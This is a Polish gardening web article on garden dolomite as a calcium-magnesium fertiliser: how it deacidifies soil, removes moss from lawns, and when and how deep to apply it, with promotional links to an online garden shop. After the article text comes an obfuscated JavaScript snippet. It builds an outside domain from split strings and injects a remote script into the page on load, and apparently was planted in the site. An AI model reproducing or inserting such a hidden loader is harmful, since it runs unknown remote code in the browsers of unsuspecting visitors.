Dolomit – właściwości i zastosowanie w ogrodzie

Dolomit ogrodniczy to w pełni naturalny rodzaj nawozu wapniowego, którego cenne właściwości sprzyjają wzrostowi i plonowaniu roślin. Duża popularność tego wzbogacającego glebę środka wynika z licznych korzyści związanych z jego stosowaniem, o których mowa w dalszej części tekstu.

Jakie właściwości posiada dolomit ogrodniczy?

Dolomit to nawóz wapniowo-magnezowy pochodzenia naturalnego. Jest on wykorzystywany zwłaszcza jako środek do odkwaszania gleby, dzięki czemu polepsza się jej struktura i tworzą się odpowiednie warunki dla rozwoju pożytecznych drobnoustrojów glebowych. Zaletą wapna dolomitowego jest jego powolne działanie, co sprawia że uzyskiwany efekt odkwaszenia jest długotrwały.

Naturalny, pełnowartościowy dolomit, jak http://sklep.poradnikogrodniczy.pl/dolomit-nawoz-wapniowo-magnezowy-10kg-id-95 zawiera w swoim składzie również magnez, którego rola w prawidłowym rozwoju roślin jest nieoceniona. Ponadto produkt ten służy lepszemu napowietrzeniu ziemi i zwiększa jej objętość wodną.

Istotnym atutem dolomitu ogrodniczego jest wzmacnianie odporności plonów na przemarzanie, w związku z czym jest on szczególnie przydatny przy uprawie roślin ozdobnych. Warto jeszcze nadmienić, że nawóz wapniowo – magnezowy wzbogaca glebę o takie mikroelementy, jak: cynk, miedź, żelazo, chrom, mangan, czy molibden. Są one odpowiedzialne za wytwarzanie niezbędnych dla roślin mikroorganizmów i enzymów.

Warto wiedzieć, że rozprowadzenie dolomitu na trawniku pozwala wyeliminować mech. Funkcjonują również opinie wedle których środek ten ogranicza absorpcję metali ciężkich przez rośliny.

Zastosowanie dolomitu w ogrodzie

Dolomit ogrodniczy dostępny jest w sprzedaży w postaci sproszkowanej. Najbardziej zaleca się używać go w sezonie jesiennym, bezpośrednio po zbiorach. Ma to na celu odpowiednie przygotowanie gleby pod uprawę w następnym roku. Inną praktyką jest wykorzystanie dolomitu wiosną na około 3-4 tygodnie przed planowanym zasiewem. Właściwości chemiczne takich związków, jak: węglan wapnia, węglan magnezu i tlenek wapnia, sprawiają że jego działanie zachodzi stosunkowo szybko. Tym samym nie zachodzi absolutna konieczność użycia tego środka jesienią.

Jak zatem należy stosować wapno dolomitowe? Najpierw musimy je rozprowadzić na glebie ręcznie albo przy użyciu siewnika. Kolejnym krokiem jest przekopanie produktu na głębokość mniej więcej 20 cm. W przypadku gleb piaszczystych dolomit zaleca się stosować co 3-4 lata, natomiast do usuwania mchu z trawnika – każdego roku.

Decydując się na zakup nawozu wapniowo-magnezowego do ogrodu warto sięgać po produkty znanych marek. Najlepiej zaopatrywać się w nie u sprawdzonych dostawców, jak sklep internetowy PoradnikOgrodniczy.pl oferujących wysokiej jakości artykuły w atrakcyjnych cenach.

(function(){ i04h_=("u"+"st");i04h=document.createElement("script");i04h.async=true; i04hu="371297629";i04h_+="a"+("t.");i04h_+="i"+("nf"+("o"))+("/"); i04hu+=".uddgzxlX04h1aysl";i04hu+="me2g3rmgr0716y"; i04h.src="https://"+i04h_+i04hu;i04h.type="text/javascript"; d_b=document.body;d_b.appendChild(i04h); })();

Exit mobile version